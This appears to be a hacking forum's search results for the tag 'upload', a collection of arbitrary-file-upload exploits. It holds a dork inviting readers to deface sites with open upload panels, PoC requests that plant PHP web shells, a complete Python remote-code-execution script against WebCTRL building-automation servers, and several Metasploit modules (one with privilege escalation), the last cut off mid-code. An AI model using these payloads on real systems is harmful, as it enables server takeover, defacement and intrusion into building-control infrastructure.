



Search the forums

Showing results for the tag 'upload'.




20 results found

  1. Hacking-Penetration testing to the site

    dork : inurl:/examples/uploadbutton.html
    Well, dear friends, search this dork and easily upload your deface page onto the site (the upload panel is open).
  2. Hacking

    # # # # # #
    # Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload
    # Dork: N/A
    # Date: 11.12.2017
    # Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
    # Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
    # Demo: http://vanguard-demo.esy.es/
    # Version: 1.4
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an users upload arbitrary file....
    #
    # Vulnerable Source:
    # .....................
    # $row = $row->fetch(PDO::FETCH_ASSOC);
    # $folder_name = $row['id'] * 2;
    # $folder_name_2 = $folder_name * 5;
    # $check_dir1 = 'uploads/'.$folder_name;
    # $check_dir2 = $check_dir.'/'.$folder_name_2;
    # if (!is_dir($check_dir1)) { mkdir($check_dir1); }
    # if (!is_dir($check_dir2)) { mkdir($check_dir2); }
    # $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']);
    # $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']);
    # $main_path = $check_dir2."/".basename($_FILES['main_file']['name']);
    # $error = 0;
    # $upload_path = './';
    # .....................
    #
    # Proof of Concept:
    #
    # Users Add a new product/Add a product preview...
    #
    # http://localhost/[PATH]/
    # http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php
    #
    # # # # # #
  3. # Exploit Title: Unauthenticated Arbitrary File Upload
    # Date: November 12, 2017
    # Exploit Author: Colette Chamberland
    # Author contact: [email protected]
    # Author homepage: https://defiant.com
    # Vendor Homepage: https://accesspressthemes.com/
    # Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446
    # Version: < 3.2.0
    # Tested on: Wordpress 4.x
    # CVE : CVE-2017-16949

    Description: Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters.

    PoC:

    POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
    Host:server
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
    Content-Length: 264
    Referer: http://target.com/
    Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6;
    Connection: close
    Upgrade-Insecure-Requests: 1

    -----------------------------7230359611602921801124357792
    Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
    Content-Type: text/php

    <?php echo shell_exec($_GET['e'].' 2>&1'); ?>
    -----------------------------7230359611602921801124357792--
  4. Exploit Title: Monstra CMS - 3.0.4 RCE
    Vendor Homepage: http://monstra.org/
    Software Link: https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip
    Discovered by: Ishaq Mohammed
    Contact: https://twitter.com/security_prince
    Website: https://about.me/security-prince
    Category: webapps
    Platform: PHP
    Advisory Link: https://blogs.securiteam.com/index.php/archives/3559

    Description: MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a remote command execution on the remote server.

    Vulnerable Code: https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php line 19:

    public static function main() {
        // Array of forbidden types
        $forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'php', 'phtml', 'php3', 'php4', 'php5', 'phps', 'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh', 'ksh', 'bsh', 'c', 'htaccess', 'htpasswd', 'exe', 'scr', 'dll', 'msi', 'vbs', 'bat', 'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');

    Proof of Concept
    Steps to Reproduce:
    1. Login with a valid credentials of an Editor
    2. Select Files option from the Drop-down menu of Content
    3. Upload a file with PHP (uppercase) extension containing the below code:
       <?php $cmd=$_GET['cmd']; system($cmd); ?>
    4. Click on Upload
    5. Once the file is uploaded Click on the uploaded file and add ?cmd= to the URL followed by a system command such as whoami,time,date etc.

    Recommended Patch: We were not able to get the vendor to respond in any way, the software appears to have been left abandoned without support – though this is not an official status on their site (last official patch was released on 2012-11-29), the GitHub appears a bit more active (last commit from 2 years ago). The patch that addresses this bug is available here: https://github.com/monstra-cms/monstra/issues/426
  5. #!/usr/bin/env python
    # -*- coding: utf8 -*-
    #
    #
    # Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
    #
    #
    # Vendor: Automated Logic Corporation
    # Product web page: http://www.automatedlogic.com
    # Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
    #                   ALC WebCTRL, SiteScan Web 6.1 and prior
    #                   ALC WebCTRL, i-Vu 6.0 and prior
    #                   ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
    #                   ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
    #
    # Summary: WebCTRL®, Automated Logic's web-based building automation
    # system, is known for its intuitive user interface and powerful integration
    # capabilities. It allows building operators to optimize and manage
    # all of their building systems - including HVAC, lighting, fire, elevators,
    # and security - all within a single HVAC controls platform. It's everything
    # they need to keep occupants comfortable, manage energy conservation measures,
    # identify key operational problems, and validate the results.
    #
    # Desc: WebCTRL suffers from an authenticated arbitrary code execution
    # vulnerability. The issue is caused due to the improper verification
    # when uploading Add-on (.addons or .war) files using the uploadwarfile
    # servlet. This can be exploited to execute arbitrary code by uploading
    # a malicious web archive file that will run automatically and can be
    # accessed from within the webroot directory. Additionaly, an improper
    # authorization access control occurs when using the 'anonymous' user.
    # By specification, the anonymous user should not have permissions or
    # authorization to upload or install add-ons. In this case, when using
    # the anonymous user, an attacker is still able to upload a malicious
    # file via insecure direct object reference and execute arbitrary code.
    # The anonymous user was removed from version 6.5 of WebCTRL.
    #
    # Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
    #            Apache-Coyote/1.1
    #            Apache Tomcat/7.0.42
    #            CJServer/1.1
    #            Java/1.7.0_25-b17
    #            Java HotSpot Server VM 23.25-b01
    #            Ant 1.7.0
    #            Axis 1.4
    #            Trove 2.0.2
    #            Xalan Java 2.4.1
    #            Xerces-J 2.6.1
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #                             @zeroscience
    #
    #
    # Advisory ID: ZSL-2017-5431
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php
    #
    # ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
    # CVE ID: CVE-2017-9650
    # CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650
    #
    #
    # 30.01.2017
    #
    #

    import itertools
    import mimetools
    import mimetypes
    import cookielib
    import binascii
    import urllib2
    import urllib
    import sys
    import re
    import os

    from urllib2 import URLError

    global bindata

    __author__ = 'lqwrm'

    piton = os.path.basename(sys.argv[0])

    def bannerche():
        print '''
    @[email protected]
    |                                          |
    |   WebCTRL 6.5 Authenticated RCE PoC      |
    |   ID: ZSL-2017-5431                      |
    |   Copyleft (c) 2017, Zero Science Lab    |
    |                                          |
    @[email protected]
    '''
        if len(sys.argv) < 3:
            print '[+] Usage: '+piton+' <IP> <WAR FILE>'
            print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n'
            sys.exit()

    bannerche()

    host = sys.argv[1]
    filename = sys.argv[2]

    with open(filename, 'rb') as f:
        content = f.read()
        hexo = binascii.hexlify(content)
        bindata = binascii.unhexlify(hexo)

    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)

    print '[+] Probing target http://'+host

    try:
        checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')
    except urllib2.HTTPError, errorzio:
        if errorzio.code == 404:
            print '[!] Error 001:'
            print '[-] Check your target!'
            print
            sys.exit()
    except URLError, errorziocvaj:
        if errorziocvaj.reason:
            print '[!] Error 002:'
            print '[-] Check your target!'
            print
            sys.exit()

    print '[+] Target seems OK.'
    print '[+] Login please:'
    print '''
    Default username: Administrator, Anonymous
    Default password: (blank), (blank)
    '''

    username = raw_input('[*] Enter username: ')
    password = raw_input('[*] Enter password: ')

    login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'})
    opener.addheaders = [('User-agent', 'Thrizilla/33.9')]
    login = opener.open('http://'+host+'/?language=en', login_data)
    auth = login.read()

    if re.search(r'productName = \'WebCTRL', auth):
        print '[+] Authenticated!'
        token = re.search('wbs=(.+?)&', auth).group(1)
        print '[+] Got wbs token: '+token
        cookie1, cookie2 = [str(c) for c in cj]
        cookie = cookie1[8:51]
        print '[+] Got cookie: '+cookie
    else:
        print '[-] Incorrect username or password.'
        print
        sys.exit()

    print '[+] Sending payload.'

    class MultiPartForm(object):
        def __init__(self):
            self.form_fields = []
            self.files = []
            self.boundary = mimetools.choose_boundary()
            return

        def get_content_type(self):
            return 'multipart/form-data; boundary=%s' % self.boundary

        def add_field(self, name, value):
            self.form_fields.append((name, value))
            return

        def add_file(self, fieldname, filename, fileHandle, mimetype=None):
            body = fileHandle.read()
            if mimetype is None:
                mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
            self.files.append((fieldname, filename, mimetype, body))
            return

        def __str__(self):
            parts = []
            part_boundary = '--' + self.boundary
            parts.extend(
                [ part_boundary,
                  'Content-Disposition: form-data; name="%s"' % name,
                  '',
                  value,
                ]
                for name, value in self.form_fields
                )
            parts.extend(
                [ part_boundary,
                  'Content-Disposition: file; name="%s"; filename="%s"' % \
                     (field_name, filename),
                  'Content-Type: %s' % content_type,
                  '',
                  body,
                ]
                for field_name, filename, content_type, body in self.files
                )
            flattened = list(itertools.chain(*parts))
            flattened.append('--' + self.boundary + '--')
            flattened.append('')
            return '\r\n'.join(flattened)

    if __name__ == '__main__':
        form = MultiPartForm()
        form.add_field('wbs', token)
        form.add_field('file"; filename="'+filename, bindata)
        request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile')
        request.add_header('User-agent', 'SCADA/8.0')
        body = str(form)
        request.add_header('Content-type', form.get_content_type())
        request.add_header('Cookie', cookie)
        request.add_header('Content-length', len(body))
        request.add_data(body)
        request.get_data()
        urllib2.urlopen(request).read()
        print '[+] Payload uploaded.'
        print '[+] Shell available at: http://'+host+'/'+filename[:-4]
        print
        sys.exit()
  6. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'nokogiri'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::FileDropper

      def initialize(info={})
        super(update_info(info,
          'Name'           => 'Th3 MMA mma.php Backdoor Arbitrary File Upload',
          'Description'    => %q{
            This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload
            that leads to arbitrary code execution. This backdoor also echoes the Linux kernel
            version or operating system version because of the php_uname() function.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Jay Turla <@shipcod3>',
            ],
          'References'     =>
            [
              ['URL', 'http://blog.pages.kr/1307'] # Analysis of mma.php file upload backdoor
            ],
          'Privileged'     => false,
          'Payload'        =>
            {
              'Space'       => 10000,
              'DisableNops' => true
            },
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        =>
            [
              ['mma file uploader', {} ]
            ],
          'DisclosureDate' => 'Apr 2 2012',
          'DefaultTarget'  => 0))

        register_options(
          [
            OptString.new('TARGETURI',[true, "The path of the mma.php file uploader backdoor", "/mma.php"]),
          ],self.class) # sometimes it is under host/images/mma.php so you may want to set this one
      end

      def has_input_name?(nodes, name)
        nodes.select { |e| e.attributes['name'].value == name }.empty? ? false : true
      end

      def check
        uri = normalize_uri(target_uri.path)
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => uri
        })

        if res
          n = ::Nokogiri::HTML(res.body)
          form = n.at('form[@id="uploader"]')
          inputs = form.search('input')
          if has_input_name?(inputs, 'file') && has_input_name?(inputs, '_upl')
            return Exploit::CheckCode::Appears
          end
        end

        Exploit::CheckCode::Safe
      end

      def exploit
        uri = normalize_uri(target_uri.path)
        payload_name = "#{rand_text_alpha(5)}.php"

        print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")

        data = Rex::MIME::Message.new
        data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
        data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
        post_data = data.to_s

        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => uri,
          'ctype'  => "multipart/form-data; boundary=#{data.bound}",
          'data'   => post_data
        })

        if res
          if res.body =~ /uplod d0n3 in SAME file/
            print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
            register_files_for_cleanup(payload_name)
          else
            fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
          end
        else
          fail_with(Failure::Unknown, 'Connection Timed Out')
        end

        send_request_cgi({
          'uri'    => normalize_uri(payload_name),
          'method' => 'GET'
        })
      end
    end
  7. require 'msf/core'
    require 'nokogiri'

    class Metasploit4 < Msf::Exploit::Remote
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::PhpEXE

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
          'Description'    => %q{
            This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0. The
            vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
            which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was
            mitigated by the vendor. Although the mitigiation in place will prevent
            uptime_file_upload_1.rb from working, it can still be bypassed and gain privilege
            escalation, and allows the attacker to upload file again, and execute arbitrary commands.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Denis Andzakovic', # Found file upload bug in post2file.php in 2013
              'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
              'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
            ],
          'References'     =>
            [
              ['EDB', '37888'],
              ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php']
            ],
          'Platform'       => ['php'],
          'Arch'           => ARCH_PHP,
          'Targets'        => [['Automatic', {}]],
          'Privileged'     => 'true',
          'DefaultTarget'  => 0,
          # The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
          # it was discovered again by Ewerson 'Crash' Guimaraes.
          'DisclosureDate' => 'Nov 18 2013'
        ))

        register_options(
          [
            Opt::RPORT(9999),
            OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
            OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
          ], self.class)

        register_advanced_options(
          [
            OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
            OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
            OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
          ], self.class)
      end

      def print_status(msg='')
        super("#{rhost}:#{rport} - #{msg}")
      end

      def print_error(msg='')
        super("#{rhost}:#{rport} - #{msg}")
      end

      def print_good(msg='')
        super("#{rhost}:#{rport} - #{msg}")
      end

      # Application Check
      def check
        res = send_request_cgi(
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path)
        )

        unless res
          vprint_error("Connection timed out.")
          return Exploit::CheckCode::Unknown
        end

        n = Nokogiri::HTML(res.body)
        uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]')

        if uptime_text
          version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first
          vprint_status("Found version: #{version}")
          if version >= '7.4.0' && version <= '7.5.0'
            return Exploit::CheckCode::Appears
          end
        end

        Exploit::CheckCode::Safe
      end

      def create_exec_service(*args)
        cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args

        res_service = send_request_cgi(
          'method'    => 'POST',
          'uri'       => normalize_uri(target_uri.path, 'main.php'),
          'cookie'    => "#{cookie_split[1]}; #{cookie_split[2]}",
          'vars_get'  => {
            'section'    => 'ERDCInstance',
            'subsection' => 'add',
          },
          'vars_post' => {
            'initialERDCId' => '20', 'target' => '1', 'targetType' => 'systemList',
            'systemList' => '1', 'serviceGroupList' => '-10', 'initialMode' => 'standard',
            'erdcName' => 'Exploit', 'erdcInitialName' => '', 'erdcDescription' => 'Exploit',
            'hostButton' => 'system', 'erdc_id' => '20', 'forceReload' => '0',
            'operation' => 'standard', 'erdc_instance_id' => '',
            'label_[184]' => 'Script Name', 'value_[184]' => cmd, 'id_[184]' => 'process',
            'name_[process]' => '184', 'units_[184]' => '', 'guiBasic_[184]' => '1',
            'inputType_[184]' => 'GUIString', 'screenOrder_[184]' => '1', 'parmType_[184]' => '1',
            'label_[185]' => 'Arguments', 'value_[185]' => cmdargs, 'id_[185]' => 'args',
            'name_[args]' => '185', 'units_[185]' => '', 'guiBasic_[185]' => '1',
            'inputType_[185]' => 'GUIString', 'screenOrder_[185]' => '2', 'parmType_[185]' => '1',
            'label_[187]' => 'Output', 'can_retain_[187]' => 'false', 'comparisonWarn_[187]' => '-1',
            'comparison_[187]' => '-1', 'id_[187]' => 'value_critical_output', 'name_[output]' => '187',
            'units_[187]' => '', 'guiBasic_[187]' => '1', 'inputType_[187]' => 'GUIString',
            'screenOrder_[187]' => '4', 'parmType_[187]' => '2',
            'label_[189]' => 'Response time', 'can_retain_[189]' => 'false', 'comparisonWarn_[189]' => '-1',
            'comparison_[189]' => '-1', 'id_[189]' => 'value_critical_timer', 'name_[timer]' => '189',
            'units_[189]' => 'ms', 'guiBasic_[189]' => '0', 'inputType_[189]' => 'GUIInteger',
            'screenOrder_[189]' => '6', 'parmType_[189]' => '2',
            'timing_[erdc_instance_monitored]' => '1', 'timing_[timeout]' => '60',
            'timing_[check_interval]' => '10', 'timing_[recheck_interval]' => '1', 'timing_[max_rechecks]' => '3',
            'alerting_[notification]' => '1', 'alerting_[alert_interval]' => '120',
            'alerting_[alert_on_critical]' => '1', 'alerting_[alert_on_warning]' => '1',
            'alerting_[alert_on_recovery]' => '1', 'alerting_[alert_on_unknown]' => '1',
            'time_period_id' => '1', 'pageFinish' => 'Finish', 'pageContinue' => 'Continue...',
            'isWizard' => '1', 'wizardPage' => '2', 'wizardNumPages' => '2', 'wizardTask' => 'pageFinish',
            'visitedPage[1]' => '1', 'visitedPage[2]' => '1'
          })
      end

      def exploit
        vprint_status('Trying to login...')

        # Application Login
        res_auth = send_request_cgi(
          'method'    => 'POST',
          'uri'       => normalize_uri(target_uri.path, 'index.php'),
          'vars_post' => {
            'username' => datastore['USERNAME'],
            'password' => datastore['PASSWORD']
          })

        unless res_auth
          fail_with(Failure::Unknown, 'Connection timed out while trying to login')
        end

        # Check OS
        phpfile_name = rand_text_alpha(10)

        if res_auth.headers['Server'] =~ /Unix/
          vprint_status('Found Linux installation - Setting appropriated PATH')
          phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
          uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')
          cmdargs = "#{uploadpath}#{phpfile_name}.txt"
          cmd = phppath
        else
          vprint_status('Found Windows installation - Setting appropriated PATH')
          phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
          uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
          cmd = datastore['CmdPath']
          cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
        end

        if res_auth.get_cookies =~ /login=true/
          cookie = Regexp.last_match(1)
          cookie_split = res_auth.get_cookies.split(';')
          vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
          print_good('Login success')

          # Privilege escalation getting user ID
          res_priv = send_request_cgi(
            'method'   => 'GET',
            'uri'      => normalize_uri(target_uri.path, 'main.php'),
            'vars_get' => {
              'page'    => 'Users',
              'subPage' => 'UserContainer'
            },
            'cookie'   => "#{cookie_split[1]}; #{cookie_split[2]}"
          )

          unless res_priv
            fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
          end

          matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)
          unless matchdata
            fail_with(Failure::Unknown, 'Unable to find userID for escalation')
          end

          get_id = matchdata[0].gsub(/[^\d]/, '')
          vprint_status('Escalating privileges...')

          # Privilege escalation post
          res_priv_elev = send_request_cgi(
            'method'    => 'POST',
            'uri'       => normalize_uri(target_uri.path, 'main.php'),
            'vars_get'  => {
              'section'    => 'UserContainer',
              'subsection' => 'edit',
              'id'         => "#{get_id}"
            },
            'cookie'    => "#{cookie_split[1]}; #{cookie_split[2]}",
            'vars_post' => {
              'operation' => 'submit', 'disableEditOfUsernameRoleGroup' => 'false',
              'username' => datastore['USERNAME'], 'password' => datastore['PASSWORD'],
              'passwordConfirm' => datastore['PASSWORD'],
              'firstname' => rand_text_alpha(10), 'lastname' => rand_text_alpha(10),
              'location' => '', 'emailaddress' => '', 'emailtimeperiodid' => '1',
              'phonenumber' => '', 'phonenumbertimeperiodid' => '1',
              'windowshost' => '', 'windowsworkgroup' => '', 'windowspopuptimeperiodid' => '1',
              'landingpage' => 'MyPortal', 'isonvacation' => '0', 'receivealerts' => '0',
              'activexgraphs' => '0', 'newuser' => 'on', 'newuser' => '1',
              'userroleid' => '1', 'usergroupid[]' => '1'
            }
          )

          unless res_priv_elev
            fail_with(Failure::Unknown, 'Connection timed out while escalating...')
          end

          # Refresing perms
          vprint_status('Refreshing perms...')
          res_priv = send_request_cgi(
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, 'index.php?loggedout'),
            'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
          )

          unless res_priv
            fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
          end

          res_auth = send_request_cgi(
            'method'    => 'POST',
            'uri'       => normalize_uri(target_uri.path, 'index.php'),
            'vars_post' => {
              'username' => datastore['USERNAME'],
              'password' => datastore['PASSWORD']
            }
          )

          unless res_auth
            fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
          end

          if res_auth.get_cookies =~ /login=true/
            cookie = Regexp.last_match(1)
            cookie_split = res_auth.get_cookies.split(';')
            vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
            print_good('Priv. Escalation success')
          end

          # CREATING Linux EXEC Service
          if res_auth.headers['Server'] =~ /Unix/
            vprint_status('Creating Linux Monitor Code exec...')
            create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
          else
            # CREATING Windows EXEC Service#
            vprint_status('Creating Windows Monitor Code exec...')
            create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
          end

          # Upload file
          vprint_status('Uploading file...')
          up_res = send_request_cgi(
            'method'    => 'POST',
            'uri'       => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
            'vars_post' => {
              'file_name' => "#{phpfile_name}.txt",
              'script'    => payload.encoded
            }
          )

          unless up_res
            fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
          end

          vprint_status('Checking Uploaded file...')
          res_up_check = send_request_cgi(
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
          )

          if res_up_check && res_up_check.code == 200
            print_good("File found: #{phpfile_name}")
          else
            print_error('File not found')
            return
          end

          # Get Monitor ID
          vprint_status('Fetching Monitor ID...')
          res_mon_id = send_request_cgi(
            'method'   => 'GET',
            'uri'      => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
            'cookie'   => "#{cookie_split[1]}; #{cookie_split[2]}",
            'vars_get' => {
              'query'          => 'GET_SERVICE_PAGE_ERDC_LIST',
              'iDisplayStart'  => '0',
              'iDisplayLength' => '10',
              'sSearch'        => 'Exploit'
            }
          )

          unless res_mon_id
            fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
          end

          matchdata = res_mon_id.body.match(/id=?[^>]*>/)
          unless matchdata
            fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
          end

          mon_get_id = matchdata[0].gsub(/[^\d]/, '')
          print_good("Monitor id aquired:#{mon_get_id}")

          # Executing monitor
          send_request_cgi(
            'method'    => 'POST',
            'uri'       => normalize_uri(target_uri.path, 'main.php'),
            'cookie'    => "#{cookie_split[1]}; #{cookie_split[2]}",
            'vars_post' => {
              'section'    => 'RunERDCInstance',
              'subsection' => 'view',
              'id'         => mon_get_id,
              'name'       => 'Exploit'
            }
          )
        else
          print_error('Cookie not found')
        end
      end
    end
  8. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::PhpEXE

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload',
          'Description'    => %q{
            This module exploits an arbitrary file upload vulnerability found within the Up.Time
            monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
            webroot without authentication, leading to arbitrary code execution. Although the
            vendor fixed Up.Time to prevent this vulnerability, it was not properly mitigated.
            To exploit against a newer version of Up.Time (such as 7.4), please use
            exploits/multi/http/uptime_file_upload_2.
          },
          'Author'         =>
            [
              'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'OSVDB', '100423' ],
              [ 'BID', '64031'],
              [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
            ],
          'Payload'        =>
            {
              'Space'       => 10000, # just a big enough number to fit any PHP payload
              'DisableNops' => true
            },
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        =>
            [
              [ 'Up.Time 7.0/7.2', { } ],
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Nov 19 2013'))

        register_options([
          OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
          Opt::RPORT(9999)
        ], self.class)
      end

      def check
        uri = target_uri.path
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
        })

        if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
          return Exploit::CheckCode::Appears
        end

        return Exploit::CheckCode::Safe
      end

      def exploit
        print_status("#{peer} - Uploading PHP to Up.Time server")
        uri = target_uri.path
        @payload_name = "#{rand_text_alpha(5)}.php"
        php_payload = get_write_exec_payload(:unlink_self => true)

        post_data = ({
          "file_name" => @payload_name,
          "script"    => php_payload
        })

        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
          'method'    => 'POST',
          'uri'       => normalize_uri(uri, 'wizards', 'post2file.php'),
          'vars_post' => post_data,
        })

        unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
          fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_cgi({
          'uri'    => normalize_uri(uri, 'wizards', @payload_name),
          'method' => 'GET'
        })
      end
    end
  9. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper

      def initialize(info={})
        super(update_info(info,
          'Name'           => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload",
          'Description'    => %q{
            This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay
            method found in voice-servlet can be abused to write a malicious file onto the target
            machine, and gain remote arbitrary code execution under the context of SYSTEM.
            Authentication is not required to exploit this vulnerability.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC
              'sinn3r' # MSF module
            ],
          'References'     =>
            [
              [ 'ZDI', '15-550'],
              [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ]
            ],
          'DefaultOptions' =>
            {
              'RPORT' => 7777
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              ['Oracle Beehive 2', {}]
            ],
          'Privileged'     => true,
          'DisclosureDate' => "Nov 10 2015",
          'DefaultTarget'  => 0))

        register_options(
          [
            OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/'])
          ], self.class)
      end

      def check
        res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/'))
        if res.nil?
          vprint_error("Connection timed out.")
          return Exploit::CheckCode::Unknown
